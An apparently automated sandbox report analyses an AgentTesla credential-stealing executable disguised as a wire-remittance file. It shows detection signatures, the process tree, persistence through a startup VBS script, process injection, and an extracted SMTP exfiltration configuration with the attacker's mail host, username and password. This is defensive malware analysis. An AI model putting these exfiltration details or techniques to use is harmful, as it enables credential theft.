Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Wire Remittance Detail.exe

Overview

General Information

Sample name:Wire Remittance Detail.exe
Analysis ID:1635011
MD5:834a1e4418d9543bcbb76aa9bd15fece
SHA1:94d13721934655c477647509025346d1b7e93344
SHA256:4587101c910c2af014b4f604c0ba76717c1c8b3f360ce0a191e81158b691f6cc
Tags:AgentTeslaexeuser-cocaman
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Wire Remittance Detail.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\Wire Remittance Detail.exe" MD5: 834A1E4418D9543BCBB76AA9BD15FECE)
    • InstallUtil.exe (PID: 6236 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 3580 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • AssemblyFullName.exe (PID: 6916 cmdline: "C:\Users\user\AppData\Roaming\AssemblyFullName.exe" MD5: 834A1E4418D9543BCBB76AA9BD15FECE)
      • InstallUtil.exe (PID: 7136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "web@iaa-airferight.com", "Password": "webmaster"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.1105377682.0000000005B50000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000006.00000002.2318499009.0000000002A01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000006.00000002.2318499009.0000000002A01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 26 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Wire Remittance Detail.exe.5b50000.9.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.Wire Remittance Detail.exe.442f68a.2.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.Wire Remittance Detail.exe.44aee70.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.Wire Remittance Detail.exe.44aee70.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.Wire Remittance Detail.exe.44aee70.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x316ef:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x31761:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x317eb:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x3187d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x318e7:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x31959:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x319ef:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x31a7f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    Click to see the 14 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2528, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs" , ProcessId: 3580, ProcessName: wscript.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 46.175.148.58, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 6236, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49682
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2528, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs" , ProcessId: 3580, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Wire Remittance Detail.exe, ProcessId: 6892, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: Wire Remittance Detail.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Found malware configuration
                    Source: 2.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "web@iaa-airferight.com", "Password": "webmaster"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeVirustotal: Detection: 54%Perma Link
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeReversingLabs: Detection: 55%
                    Multi AV Scanner detection for submitted file
                    Source: Wire Remittance Detail.exeVirustotal: Detection: 54%Perma Link
                    Source: Wire Remittance Detail.exeReversingLabs: Detection: 55%
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: Wire Remittance Detail.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49681 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49685 version: TLS 1.2
                    Source: Wire Remittance Detail.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1106231956.0000000005E50000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000042AB000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000041F0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1106231956.0000000005E50000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000042AB000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000041F0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 4x nop then jmp 063F5610h5_2_063F5558
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 4x nop then jmp 063F5610h5_2_063F5550
                    Source: Joe Sandbox ViewIP Address: 46.175.148.58 46.175.148.58
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.10:49682 -> 46.175.148.58:25
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: mail.iaa-airferight.com
                    Source: InstallUtil.exe, 00000002.00000002.1228824034.000000000312C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.0000000002A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.iaa-airferight.com
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1228824034.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.00000000029BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1228824034.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.00000000029BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: InstallUtil.exe, 00000002.00000002.1228824034.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.00000000029BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: InstallUtil.exe, 00000002.00000002.1228824034.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.00000000029BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49681 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49685 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, abAX9N.cs.Net Code: OPnJT

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.Wire Remittance Detail.exe.44aee70.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.AssemblyFullName.exe.4337120.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.AssemblyFullName.exe.4337120.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_063F6E78 NtProtectVirtualMemory,5_2_063F6E78
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_063FA830 NtResumeThread,5_2_063FA830
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_063F6E71 NtProtectVirtualMemory,5_2_063F6E71
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_063FA828 NtResumeThread,5_2_063FA828
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeCode function: 0_2_0301EB280_2_0301EB28
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeCode function: 0_2_0301A9200_2_0301A920
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeCode function: 0_2_0301A9300_2_0301A930
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeCode function: 0_2_0301B2C80_2_0301B2C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_015341C02_2_015341C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0153E4802_2_0153E480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0153A9472_2_0153A947
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01534A902_2_01534A90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0153DCB82_2_0153DCB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01533E782_2_01533E78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_069D55882_2_069D5588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_069D65E02_2_069D65E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_069D7D682_2_069D7D68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_069DB20F2_2_069DB20F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_069D30402_2_069D3040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_069D76882_2_069D7688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_069D5CD32_2_069D5CD3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_069DE3882_2_069DE388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_069D03382_2_069D0338
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_069D234A2_2_069D234A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_069D00062_2_069D0006
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_02F3EB285_2_02F3EB28
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_02F3A9305_2_02F3A930
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_02F3A9205_2_02F3A920
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_02F3B2C85_2_02F3B2C8
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_063EF5A05_2_063EF5A0
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_063EF2D05_2_063EF2D0
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_063EDCF85_2_063EDCF8
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_063F3A385_2_063F3A38
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_063F3A285_2_063F3A28
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_063F5F285_2_063F5F28
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_063F5F185_2_063F5F18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00EEE6A16_2_00EEE6A1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00EEA94F6_2_00EEA94F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00EE4A986_2_00EE4A98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00EE3E806_2_00EE3E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00EE41C86_2_00EE41C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_062FA25C6_2_062FA25C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_062FB8806_2_062FB880
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_063055886_2_06305588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_063065E06_2_063065E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0630B20F6_2_0630B20F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_063030406_2_06303040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06307D686_2_06307D68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_063076886_2_06307688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_063002BA6_2_063002BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0630234B6_2_0630234B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0630E3886_2_0630E388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_063000076_2_06300007
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06305CD36_2_06305CD3
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Wire Remittance Detail.exe
